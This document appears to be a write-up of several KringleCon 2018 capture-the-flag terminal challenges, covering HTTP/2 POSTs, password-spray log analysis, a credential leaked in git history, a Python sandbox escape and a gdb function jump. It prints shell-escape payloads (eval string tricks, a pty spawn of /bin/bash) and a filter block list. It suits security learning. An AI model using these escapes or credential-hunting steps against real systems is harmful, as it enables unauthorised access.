elf@http2:~$ curl -v --http2 http://localhost:8080/
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 8080 (#0)
> GET / HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.52.1
> Accept: */*
> Connection: Upgrade, HTTP2-Settings
> Upgrade: h2c
> HTTP2-Settings: AAMAAABkAARAAAAA
> 
* Curl_http_done: called premature == 0

Well, that didn't work. Let's try to find out more about the --http2 flag. We can run curl --help, and see:

--http2                  Use HTTP 2 (H)
--http2-prior-knowledge  Use HTTP 2 without HTTP/1.1 Upgrade (H)

Let's try doing it without the HTTP/1.1 upgrade:

elf@http2:~$ curl -v --http2-prior-knowledge http://localhost:8080/
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 8080 (#0)
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55e0a5cbedc0)
> GET / HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.52.1
> Accept: */*
> 
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 200 
< server: nginx/1.10.3
< date: Sat, 12 Jan 2019 21:06:41 GMT
< content-type: text/html; charset=UTF-8
< 
<html>
 <head>
  <title>Candy Striper Turner-On'er</title>
 </head>
 <body>
 <p>To turn the machine on, simply POST to this URL with parameter "status=on"

 </body>
</html>
* Curl_http_done: called premature == 0
* Connection #0 to host localhost left intact

Ok! Now, instead of sending an empty GET, we need to send a POST with the right paramter. Once again, we'll return to the help output:

-d, --data DATA HTTP POST data (H)

Easy enough:

elf@http2:~$ curl -v --http2-prior-knowledge --data 'status=on' http://localhost:8080/
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 8080 (#0)
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x563dc369cdc0)
> POST / HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.52.1
> Accept: */*
> Content-Length: 9
> Content-Type: application/x-www-form-urlencoded
> 
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
* We are completely uploaded and fine
< HTTP/2 200 
< server: nginx/1.10.3
< date: Sat, 12 Jan 2019 21:08:29 GMT
< content-type: text/html; charset=UTF-8
< 
<html>
 <head>
  <title>Candy Striper Turner-On'er</title>
 </head>
 <body>
 <p>To turn the machine on, simply POST to this URL with parameter "status=on"


                                                                okkd,          
                                                               OXXXXX,         
                                                              oXXXXXXo         
                                                             ;XXXXXXX;         
                                                            ;KXXXXXXx          
                                                           oXXXXXXXO           
                                                        .lKXXXXXXX0.           
  ''''''       .''''''       .''''''       .:::;   ':okKXXXXXXXX0Oxcooddool,   
 'MMMMMO',,,,,;WMMMMM0',,,,,;WMMMMMK',,,,,,occccoOXXXXXXXXXXXXXxxXXXXXXXXXXX.  
 'MMMMN;,,,,,'0MMMMMW;,,,,,'OMMMMMW:,,,,,'kxcccc0XXXXXXXXXXXXXXxx0KKKKK000d;   
 'MMMMl,,,,,,oMMMMMMo,,,,,,lMMMMMMd,,,,,,cMxcccc0XXXXXXXXXXXXXXOdkO000KKKKK0x. 
 'MMMO',,,,,;WMMMMMO',,,,,,NMMMMMK',,,,,,XMxcccc0XXXXXXXXXXXXXXxxXXXXXXXXXXXX: 
 'MMN,,,,,,'OMMMMMW;,,,,,'kMMMMMW;,,,,,'xMMxcccc0XXXXXXXXXXXXKkkxxO00000OOx;.  
 'MMl,,,,,,lMMMMMMo,,,,,,cMMMMMMd,,,,,,:MMMxcccc0XXXXXXXXXXKOOkd0XXXXXXXXXXO.  
 'M0',,,,,;WMMMMM0',,,,,,NMMMMMK,,,,,,,XMMMxcccckXXXXXXXXXX0KXKxOKKKXXXXXXXk.  
 .c.......'cccccc.......'cccccc.......'cccc:ccc: .c0XXXXXXXXXX0xO0000000Oc     
                                                    ;xKXXXXXXX0xKXXXXXXXXK.    
                                                       ..,:ccllc:cccccc:'      


Unencrypted 2.0? He's such a silly guy.
That's the kind of stunt that makes my OWASP friends all cry.
Truth be told: most major sites are speaking 2.0;
TLS connections are in place when they do so.

-Holly Evergreen
<p>Congratulations! You've won and have successfully completed this challenge.
<p>POSTing data in HTTP/2.0.

 </body>
</html>
* Curl_http_done: called premature == 0
* Connection #0 to host localhost left intact

This system had some interesting commands in the bash history:

elf@http2:~$ grep curl .bash_history 
curl --http2-prior-knowledge http://localhost:8080/index.php

We found a comment from Bushy in the nginx config, which told us that HTTP2 was enabled on this system. Using a combination of Chris Elgee's talk and the curl help output, we figured out the correct parameters to have curl be able to send the request as HTTP2 (without trying to HTTP/1.1 and doing an upgrade to HTTP2 first). Then, the output from the page told us that we needed to submit a POST request, with status=on.

When we start the Cranberry Pi, we get the following message:

I am Pepper Minstix, and I'm looking for your help.
Bad guys have us tangled up in pepperminty kelp!
"Password spraying" is to blame for this our grinchly fate.
Should we blame our password policies which users hate?

Here you'll find a web log filled with failure and success.
One successful login there requires your redress.
Can you help us figure out which user was attacked?
Tell us who fell victim, and please handle this with tact...

  Submit the compromised webmail username to 
  runtoanswer to complete this challenge.

Checking our home directory, we see:

elf@spray-detect:~$ ls
evtx_dump.py  ho-ho-no.evtx  runtoanswer    

evtx_dump.py must be the Python script Pepper was referring to, for converting ho-ho-no.evtx to XML.

First, we figure out how to run evtx_dump.py:

elf@spray-detect:~$ python evtx_dump.py
usage: evtx_dump.py [-h] evtx
evtx_dump.py: error: too few arguments
elf@spray-detect:~$ python evtx_dump.py ho-ho-no.evtx
<?xml version="1.1" encoding="utf-8" standalone="yes" ?>
<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}"></Provider>
<EventID Qualifiers="">4647</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12545</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
...

Next, we'll save the XML version to a file, so we're not waiting on the Python script to re-parse the events each time.

elf@spray-detect:~$ python evtx_dump.py ho-ho-no.evtx > ho-ho-no.xml

At this point, we follow along in Beau's video. We learn that password spraying involves trying a single password across a large number of accounts. That way, account lockout polices don't trigger. He also mentions that a good way to try this is via e-mail servers like OWA, using his tool, MailSniper. Given that Pepper's hint is about MailSniper, we suspect that this is likely the vector being used.

Taking a closer look at our logs, we see events such as:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System>
        <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}"></Provider>
        <EventID Qualifiers="">4647</EventID>
        <Version>0</Version>
        <Level>0</Level>
        <Task>12545</Task>
        <Opcode>0</Opcode>
        <Keywords>0x8020000000000000</Keywords>
        <TimeCreated SystemTime="2018-09-10 12:18:26.972103"></TimeCreated>
        <EventRecordID>231712</EventRecordID>
        <Correlation ActivityID="{fd18dc13-48f8-0001-58dc-18fdf848d401}" RelatedActivityID=""></Correlation>
        <Execution ProcessID="660" ThreadID="752"></Execution>
        <Channel>Security</Channel>
        <Computer>WIN-KCON-EXCH16.EM.KRINGLECON.COM</Computer>
        <Security UserID=""></Security>
    </System>
    <EventData>
        <Data Name="TargetUserSid">S-1-5-21-25059752-1411454016-2901770228-500</Data>
        <Data Name="TargetUserName">Administrator</Data>
        <Data Name="TargetDomainName">EM.KRINGLECON</Data>
        <Data Name="TargetLogonId">0x0000000000969b09</Data>
    </EventData>
</Event>

Let's start by seeing which systems we have log data from. To do this, we'll use the grep command, to only return lines from the file which match our search term, and then we'll use the pipe (|) operator to pass those lines to sort. Finally, we'll pass the sorted lines to the uniq ("unique") command, which will only print a line if it's different from the line above it. sort and uniq are often used together in this way, since uniq only compares the line to the line above it when deciding whether or not to print it.

elf@spray-detect:~$ grep '<Computer>' ho-ho-no.xml | sort | uniq
<Computer>WIN-KCON-EXCH16.EM.KRINGLECON.COM</Computer>

We only have logs from a single system, which we suspect to be an Exchange Server 2016 from its hostname. Let's see what events we have:

elf@spray-detect:~$ grep 'EventID' ho-ho-no.xml | sort | uniq
<EventID Qualifiers="">4608</EventID>
<EventID Qualifiers="">4624</EventID>
<EventID Qualifiers="">4625</EventID>
<EventID Qualifiers="">4647</EventID>
<EventID Qualifiers="">4688</EventID>
<EventID Qualifiers="">4724</EventID>
<EventID Qualifiers="">4738</EventID>
<EventID Qualifiers="">4768</EventID>
<EventID Qualifiers="">4769</EventID>
<EventID Qualifiers="">4776</EventID>
<EventID Qualifiers="">4799</EventID>
<EventID Qualifiers="">4826</EventID>
<EventID Qualifiers="">4902</EventID>
<EventID Qualifiers="">4904</EventID>
<EventID Qualifiers="">5024</EventID>
<EventID Qualifiers="">5033</EventID>
<EventID Qualifiers="">5059</EventID>

A bit of research gives us names to go with these EventIDs:

4624 and 4625 seem interesting. Let's update our previous command to include the number of occurences of each event by using -c, --count prefix lines by the number of occurrences:

elf@spray-detect:~$ grep 'EventID' ho-ho-no.xml | sort | uniq -c
      1 <EventID Qualifiers="">4608</EventID>
    756 <EventID Qualifiers="">4624</EventID>
    212 <EventID Qualifiers="">4625</EventID>
      1 <EventID Qualifiers="">4647</EventID>

So, we've had 756 accounts successful logon attempts, and 212 failed ones.

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System>
        <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}"></Provider>
        <EventID Qualifiers="">4624</EventID>
        <Version>2</Version>
        <Level>0</Level>
        <Task>12544</Task>
        <Opcode>0</Opcode>
        <Keywords>0x8020000000000000</Keywords>
        <TimeCreated SystemTime="2018-09-10 12:19:20.695601"></TimeCreated>
        <EventRecordID>231726</EventRecordID>
        <Correlation ActivityID="" RelatedActivityID=""></Correlation>
        <Execution ProcessID="664" ThreadID="668"></Execution>
        <Channel>Security</Channel>
        <Computer>WIN-KCON-EXCH16.EM.KRINGLECON.COM</Computer>
        <Security UserID=""></Security>
    </System>
    <EventData>
        <Data Name="SubjectUserSid">S-1-0-0</Data>
        <Data Name="SubjectUserName">-</Data>
        <Data Name="SubjectDomainName">-</Data>
        <Data Name="SubjectLogonId">0x0000000000000000</Data>
        <Data Name="TargetUserSid">S-1-5-18</Data>
        <Data Name="TargetUserName">SYSTEM</Data>
        <Data Name="TargetDomainName">NT AUTHORITY</Data>
        <Data Name="TargetLogonId">0x00000000000003e7</Data>
        <Data Name="LogonType">0</Data>
        <Data Name="LogonProcessName">-</Data>
        <Data Name="AuthenticationPackageName">-</Data>
        <Data Name="WorkstationName">-</Data>
        <Data Name="LogonGuid">{00000000-0000-0000-0000-000000000000}</Data>
        <Data Name="TransmittedServices">-</Data>
        <Data Name="LmPackageName">-</Data>
        <Data Name="KeyLength">0</Data>
        <Data Name="ProcessId">0x0000000000000004</Data>
        <Data Name="ProcessName"></Data>
        <Data Name="IpAddress">-</Data>
        <Data Name="IpPort">-</Data>
        <Data Name="ImpersonationLevel">-</Data>
        <Data Name="RestrictedAdminMode">-</Data>
        <Data Name="TargetOutboundUserName">-</Data>
        <Data Name="TargetOutboundDomainName">-</Data>
        <Data Name="VirtualAccount">%%1843</Data>
        <Data Name="TargetLinkedLogonId">0x0000000000000000</Data>
        <Data Name="ElevatedToken">%%1842</Data>
    </EventData>
</Event>
...
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System>
        <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}"></Provider>
        <EventID Qualifiers="">4625</EventID>
        <Version>0</Version>
        <Level>0</Level>
        <Task>12544</Task>
        <Opcode>0</Opcode>
        <Keywords>0x8010000000000000</Keywords>
        <TimeCreated SystemTime="2018-09-10 12:41:50.900736"></TimeCreated>
        <EventRecordID>234488</EventRecordID>
        <Correlation ActivityID="{71a9b66f-4900-0001-a8b6-a9710049d401}" RelatedActivityID=""></Correlation>
        <Execution ProcessID="664" ThreadID="712"></Execution>
        <Channel>Security</Channel>
        <Computer>WIN-KCON-EXCH16.EM.KRINGLECON.COM</Computer>
        <Security UserID=""></Security>
    </System>
    <EventData>
        <Data Name="SubjectUserSid">S-1-5-18</Data>
        <Data Name="SubjectUserName">WIN-KCON-EXCH16$</Data>
        <Data Name="SubjectDomainName">EM.KRINGLECON</Data>
        <Data Name="SubjectLogonId">0x00000000000003e7</Data>
        <Data Name="TargetUserSid">S-1-0-0</Data>
        <Data Name="TargetUserName">sparkle.redberry</Data>
        <Data Name="TargetDomainName">EM.KRINGLECON</Data>
        <Data Name="Status">0xc000006d</Data>
        <Data Name="FailureReason">%%2313</Data>
        <Data Name="SubStatus">0xc000006a</Data>
        <Data Name="LogonType">8</Data>
        <Data Name="LogonProcessName">Advapi  </Data>
        <Data Name="AuthenticationPackageName">Negotiate</Data>
        <Data Name="WorkstationName">WIN-KCON-EXCH16</Data>
        <Data Name="TransmittedServices">-</Data>
        <Data Name="LmPackageName">-</Data>
        <Data Name="KeyLength">0</Data>
        <Data Name="ProcessId">0x00000000000019f0</Data>
        <Data Name="ProcessName">C:\Windows\System32\inetsrv\w3wp.exe</Data>
        <Data Name="IpAddress">10.158.210.210</Data>
        <Data Name="IpPort">47904</Data>
    </EventData>
</Event>

At this point, there's a few ways we can proceed to analyze the logs. However, parsing XML data becomes tricky with the standard *NIX text-processing tools (grep, sed, awk, etc.). Instead, we'll write up a Python script:

from xml.dom import minidom

event_names = {'4624': 'Success', '4625': 'Failure'}

# Parse the file
xmldoc = minidom.parse('ho-ho-no.xml')

# Top-node: <Event>
events = xmldoc.getElementsByTagName('Event')

for event in events:
    # Each Event has <System> and <EventData>
    system = event.getElementsByTagName('System')[0]
    eventdata = event.getElementsByTagName('EventData')[0]
    eventid = system.getElementsByTagName('EventID')[0].firstChild.nodeValue

    if eventid not in event_names.keys():
        # We don't care about other events
        continue

    # EventData has one ore more <Data> elements
    data_nodes = eventdata.getElementsByTagName('Data')
    for data in data_nodes:
        if data.attributes['Name'].nodeValue == 'TargetUserName':
            print event_names[eventid], data.firstChild.nodeValue

When we run the script, we get the authentication result, and the username. The last lines printed are along the lines of:

elf@spray-detect:~$ python parse_evtx.py
...
Success HealthMailboxbe58608
Success HealthMailboxbe58608
Success HealthMailboxbe58608
Success HealthMailboxbab78a6
Success HealthMailboxbe58608
Success HealthMailboxbab78a6
Success HealthMailboxbe58608
Success HealthMailboxbe58608
Success HealthMailboxbe58608
Success HealthMailboxbe58608
Success HealthMailboxbe58608

We can use grep to ignore the mailbox. This time, we'll use the -v flag: -v, --invert-match Selected lines are those not matching any of the specified patterns.

elf@spray-detect:~$ python parse_evtx.py | grep -v HealthMailbox
...
Failure steven.smith
Failure sugerplum.mary
Failure sunil.kumar
Failure suresh.kumar
Failure tim.smith
Failure tom.smith
Failure tyler.smith
Failure vijay.kumar
Failure vinod.kumar
Failure wunorse.openslae
Success minty.candycane
Success wunorse.openslae
Success SYSTEM

This does look like a password spraying attack. We see a large number of failures, going alphabetically. Interestingly, it seems like SugarPlum Mary's account name is misspelled, leading more credence to the theory that the attacker is going off of a list of usernames.

After the failures, we see successful logins for Minty and Wunorse. To get a better sense of what's going on, we'll update our script to add the timestamp and IP address as well:

2018-09-10 12:54:56.034510 Failure test.user 172.31.254.101
2018-09-10 12:58:07.518818 Success shinny.upatree 172.18.101.231
2018-09-10 13:03:33.271959 Failure aaron.smith 172.31.254.101
2018-09-10 13:03:34.075348 Failure abhishek.kumar 172.31.254.101
2018-09-10 13:03:34.660316 Failure adam.smith 172.31.254.101
2018-09-10 13:03:35.204905 Failure ahmed.ali 172.31.254.101
2018-09-10 13:03:35.766270 Failure ahmed.hassan 172.31.254.101
...
2018-09-10 13:05:03.702278 Success minty.candycane 172.31.254.101
...
2018-09-10 13:05:37.099594 Failure tyler.smith 172.31.254.101
2018-09-10 13:05:37.695000 Failure vijay.kumar 172.31.254.101
2018-09-10 13:05:38.474575 Failure vinod.kumar 172.31.254.101
2018-09-10 13:05:39.123190 Failure wunorse.openslae 172.31.254.101
2018-09-10 13:07:02.556292 Success minty.candycane 172.31.254.101
2018-09-10 13:10:18.123104 Success wunorse.openslae 10.231.108.200
2018-09-10 13:13:16.175577 Success SYSTEM -

It looks like the attack started at 12:54, with "test.user," then proceeded alphabetically, ending about 10 minutes later, at 13:05. All of those attempts came from the same IP address, 172.31.254.101.

As the attacker was trying passwords, they were able to successfully login as minty.candycane. After the attack ended, they logged in as minty.candycane again. Her account is the only account from that IP address that had a successful login.

elf@spray-detect:~$ ./runtoanswer 
Loading, please wait......



Whose account was successfully accessed by the attacker's password spray? minty.candycane


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMkl0MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMXO0NMxl0MXOONMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMxlllooldollo0MMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMW0OKWMMNKkollldOKWMMNKOKMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMXollox0NMMMxlOMMMXOdllldWMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMWXOdlllokKxlk0xollox0NMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMNkkXMMMMMMMMMMMWKkollllllldkKWMMMMMMMMMMM0kOWMMMMMMMMMMMM
MMMMMMWKXMMMkllxMMMMMMMMMMMMMMMXOold0NMMMMMMMMMMMMMMMollKMMWKKWMMMMMM
MMMMMMdllKMMkllxMMMMMMMMMMMMN0KNMxl0MN00WMMMMMMMMMMMMollKMMOllkMMMMMM
Mkox0XollKMMkllxMMMMMMMMMMMMxllldoldolllOMMMMMMMMMMMMollKMMkllxXOdl0M
MMN0dllll0MMkllxMMMMMMMMMMMMMN0xolllokKWMMMMMMMMMMMMMollKMMkllllx0NMM
MW0xolllolxOxllxMMNxdOMMMMMWMMMMWxlOMMMMWWMMMMWkdkWMMollOOdlolllokKMM
M0lldkKWMNklllldNMKlloMMMNolok0NMxl0MX0xolxMMMXlllNMXolllo0NMNKkoloXM
MMWWMMWXOdlllokdldxlloWMMXllllllooloollllllWMMXlllxolxxolllx0NMMMNWMM
MMMN0kolllx0NMMW0ollll0NMKlloN0kolllokKKlllWMXklllldKMMWXOdlllokKWMMM
MMOllldOKWMMMMkollox0OdldxlloMMMMxlOMMMNlllxoox0Oxlllo0MMMMWKkolllKMM
MMW0KNMMMMMMMMKkOXWMMMW0olllo0NMMxl0MWXklllldXMMMMWKkkXMMMMMMMMX0KWMM
MMMMMMMMMMMMMMMMMMMW0xollox0Odlokdlxxoox00xlllokKWMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMWollllOWMMMMNklllloOWMMMMNxllllxMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMN0xlllokK0xookdlxxookK0xollokKWMMMMMMMMMMMMMMMMMMM
MMWKKWMMMMMMMMKk0XMMMMW0ollloOXMMxl0MWKklllldKWMMMWXOOXMMMMMMMMNKKMMM
MMkllldOXWMMMMklllok00xoodlloMMMMxlOMMMNlllxook00xollo0MMMMWKkdlllKMM
MMMN0xollox0NMMW0ollllONMKlloNKkollldOKKlllWMXklllldKWMMX0xlllok0NMMM
MMWWMMWKkollldkxlodlloWMMXllllllooloollllllWMMXlllxooxkollldOXMMMWMMM
M0lldOXWMNklllldNMKlloMMMNolox0XMxl0WXOxlldMMMXlllNMXolllo0WMWKkdloXM
MW0xlllodldOxllxMMNxdOMMMMMNMMMMMxlOMMMMWNMMMMWxdxWMMollkkoldlllokKWM
MMN0xllll0MMkllxMMMMMMMMMMMMMNKkolllokKWMMMMMMMMMMMMMollKMMkllllkKWMM
MkldOXollKMMkllxMMMMMMMMMMMMxlllooloolll0MMMMMMMMMMMMollKMMkllxKkol0M
MWWMMMdllKMMkllxMMMMMMMMMMMMXO0XMxl0WXOONMMMMMMMMMMMMollKMMOllkMMMWMM
MMMMMMNKKMMMkllxMMMMMMMMMMMMMMMN0oldKWMMMMMMMMMMMMMMMollKMMWKKWMMMMMM
MMMMMMMMMMMMXkxXMMMMMMMMMMMWKkollllllldOXMMMMMMMMMMMM0xkWMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMX0xlllok0xlk0xollox0NMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMXollldOXMMMxlOMMWXOdllldWMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMW0OKWMMWKkollldOXWMMN0kKMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMklllooloollo0MMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMXOOXMxl0WKOONMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMkl0MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM

Silly Minty Candycane, well this is what she gets.
"Winter2018" isn't for The Internets.
Passwords formed with season-year are on the hackers' list.
Maybe we should look at guidance published by the NIST?

Congratulations!

Silly Minty, indeed. If only she had listened to Beau's talk…

Answer:

Using the provided script, we converted the event logs to XML. Using basic \*NIX text-processing tools, we got an overview of the logs, then wrote a Python script to print out the relevant details. The password spraying attack was easy to spot, and all the attempts came from a single IP address. Only one user, minty.candycane, had a successful login from that IP.

Once we connect:

Coalbox again, and I've got one more ask.
Sparkle Q. Redberry has fumbled a task.
Git pull and merging, she did all the day;
With all this gitting, some creds got away.

Urging - I scolded, "Don't put creds in git!"
She said, "Don't worry - you're having a fit.
If I did drop them then surely I could,
Upload some new code done up as one should."

Though I would like to believe this here elf,
I'm worried we've put some creds on a shelf.
Any who's curious might find our "oops,"
Please find it fast before some other snoops!

Find Sparkle's password, then run the runtoanswer tool.

First, we see what we're working with:

elf@gitpasshist:~$ ls
kcconfmgmt  runtoanswer
elf@gitpasshist:~$ cd kcconfmgmt/
elf@gitpasshist:~/kcconfmgmt$ ls
README.md  app.js  package-lock.json  package.json  public  routes  server  views
elf@gitpasshist:~/kcconfmgmt$ ls --all
.  ..  .git  README.md  app.js  package-lock.json  package.json  public  routes  server  views

kcconfmgmt is a git repo, and we need to find some credentials in the history. The Git Cheat Sheet gives us the following command to search commits: git log --grep="Message"

elf@gitpasshist:~/kcconfmgmt$ git log --grep="password"
commit d84b728c7d9cf7f9bafc5efb9978cd0e3122283d
Author: Sparkle Redberry <sredberry@kringlecon.com>
Date:   Sat Nov 10 19:51:52 2018 -0500

    Add user model for authentication, bcrypt password storage

commit 60a2ffea7520ee980a5fc60177ff4d0633f2516b
Author: Sparkle Redberry <sredberry@kringlecon.com>
Date:   Thu Nov 8 21:11:03 2018 -0500

    Per @tcoalbox admonishment, removed username/password from config.js, default settings 
    in config.js.def need to be updated before use

To view the changes, the cheat sheet suggests the following command:

elf@gitpasshist:~/kcconfmgmt$ git log -p 60a2ffea7520ee980a5fc60177ff4d0633f2516b
commit 60a2ffea7520ee980a5fc60177ff4d0633f2516b
Author: Sparkle Redberry <sredberry@kringlecon.com>
Date:   Thu Nov 8 21:11:03 2018 -0500

    Per @tcoalbox admonishment, removed username/password from config.js, default settings in config.js.def need to be updated before use

diff --git a/server/config/config.js b/server/config/config.js
deleted file mode 100644
index 25be269..0000000
--- a/server/config/config.js
+++ /dev/null
@@ -1,4 +0,0 @@
-// Database URL
-module.exports = {
-    'url' : 'mongodb://sredberry:twinkletwinkletwinkle@127.0.0.1:27017/node-api'
-};
diff --git a/server/config/config.js.def b/server/config/config.js.def
new file mode 100644
index 0000000..740eba5
--- /dev/null
+++ b/server/config/config.js.def
@@ -0,0 +1,4 @@
+// Database URL
+module.exports = {
+    'url' : 'mongodb://username:password@127.0.0.1:27017/node-api'
+};

We see that in config.js, the credentials were sredberry and "twinkletwinkletwinkle":

elf@gitpasshist:~$ ./runtoanswer 
Loading, please wait......



Enter Sparkle Redberry's password: twinkletwinkletwinkle


This ain't "I told you so" time, but it's true:
I shake my head at the goofs we go through.
Everyone knows that the gits aren't the place;
Store your credentials in some safer space.

Congratulations!

Answer:

We got fairly lucky on this one. We searched commits for "password," and then viewed the details of an interesting commit.

Launching this terminal, we see something a bit different:

I'm another elf in trouble,
Caught within this Python bubble.

Here I clench my merry elf fist -
Words get filtered by a black list!

Can't remember how I got stuck,
Try it - maybe you'll have more luck?

For this challenge, you are more fit.
Beat this challenge - Mark and Bag it!

-SugarPlum Mary

To complete this challenge, escape Python
and run ./i_escaped
>>> 

We need to run i_escaped, either from Python, or after we've escaped. A simple way to exit Python is to call sys.exit:

>>> sys.exit(0)
Traceback (most recent call last):
  File "<console>", line 1, in <module>
NameError: name 'sys' is not defined
>>> import sys
Use of the command import is prohibited for this question.

Foiled. Watching Mark's talk, we see similarities with using readfunc to filter prohibited words. Mark suggests checking to see if exec() is available:

>>> exec
Use of the command exec is prohibited for this question.

Next, let's try eval():

>>> eval
<built-in function eval>

That's promising. We try what Mark suggests using eval:

>>> os.system("./i_escaped")
Use of the command os.system is prohibited for this question.
>>> eval('os.sy' + 'stem("./i_escaped")')
Loading, please wait......


  ____        _   _                      
 |  _ \ _   _| |_| |__   ___  _ __       
 | |_) | | | | __| '_ \ / _ \| '_ \      
 |  __/| |_| | |_| | | | (_) | | | |     
 |_|___ \__, |\__|_| |_|\___/|_| |_| _ _ 
 | ____||___/___ __ _ _ __   ___  __| | |
 |  _| / __|/ __/ _` | '_ \ / _ \/ _` | |
 | |___\__ \ (_| (_| | |_) |  __/ (_| |_|
 |_____|___/\___\__,_| .__/ \___|\__,_(_)
                     |_|                             


That's some fancy Python hacking -
You have sent that lizard packing!

-SugarPlum Mary

You escaped! Congratulations!

Once we've escaped, we can see how this challenge was setup:

restricted_terms = ['import','pty', 'open','exec',"compile", "os.system", 
                    "subprocess.", "reload", "__builtins__" ,"__class__","__mro__" ]
code.interact(banner=banner, readfunc=readfilter, local=locals())
#eval("__im"+"port__('p'+'ty').s"+"pawn('/bin/bash')")    

We basically followed Mark's talk directly. import and exec was blocked, but eval was available. We called i_escaped directly from Python, without ever actually escaping.

The terminal greets us with:

I'll hear the bells on Christmas Day
Their sweet, familiar sound will play
  But just one elf,
  Pulls off the shelf,
The bells to hang on Santa's sleigh!

Please call me Shinny Upatree
I write you now, 'cause I would be
  The one who gets -
  Whom Santa lets
The bells to hang on Santa's sleigh!

But all us elves do want the job,
Conveying bells through wint'ry mob
  To be the one
  Toy making's done
The bells to hang on Santa's sleigh!

To make it fair, the Man devised
A fair and simple compromise.
  A random chance,
  The winner dance!
The bells to hang on Santa's sleigh!

Now here I need your hacker skill.
To be the one would be a thrill!
  Please do your best,
  And rig this test
The bells to hang on Santa's sleigh!

Complete this challenge by winning the sleighbell lottery for Shinny Upatree.

We start by investigating our surroundings:

elf@unlinked-function:~$ ls
gdb  objdump  sleighbell-lotto
elf@unlinked-function:~$ ls -l
total 40
lrwxrwxrwx 1 elf  elf     12 Dec 14 16:21 gdb -> /usr/bin/gdb
lrwxrwxrwx 1 elf  elf     16 Dec 14 16:21 objdump -> /usr/bin/objdump
-rwxr-xr-x 1 root root 38144 Dec 14 16:22 sleighbell-lotto

We start following along with the blog post. We'll start with nm (display name list), and as the post tells us to focus on symbol types 'T' (text section symbols):

elf@unlinked-function:~$ nm ./sleighbell-lotto | grep ' T '
0000000000001620 T __libc_csu_fini
00000000000015b0 T __libc_csu_init
0000000000001624 T _fini
00000000000008c8 T _init
0000000000000a00 T _start
0000000000000c1e T base64_cleanup
0000000000000c43 T base64_decode
0000000000000bcc T build_decoding_table
0000000000000b0a T hmac_sha256
00000000000014ca T main
00000000000014b7 T sorry
0000000000000f18 T tohex
0000000000000fd7 T winnerwinner    

winnerwinner looks promising. Let's see if we can use gdb to call that:

elf@unlinked-function:~$ gdb -q ./sleighbell-lotto
Reading symbols from ./sleighbell-lotto...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x14ce
(gdb) run
Starting program: /home/elf/sleighbell-lotto 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, 0x00005555555554ce in main ()
(gdb) jump winnerwinner
Continuing at 0x555555554fdb.

                                                     .....          ......      
                                     ..,;:::::cccodkkkkkkkkkxdc;.   .......     
                             .';:codkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx.........    
                         ':okkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx..........   
                     .;okkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkdc..........   
                  .:xkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkko;.     ........   
                'lkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx:.          ......    
              ;xkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkd'                       
            .xkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx'                         
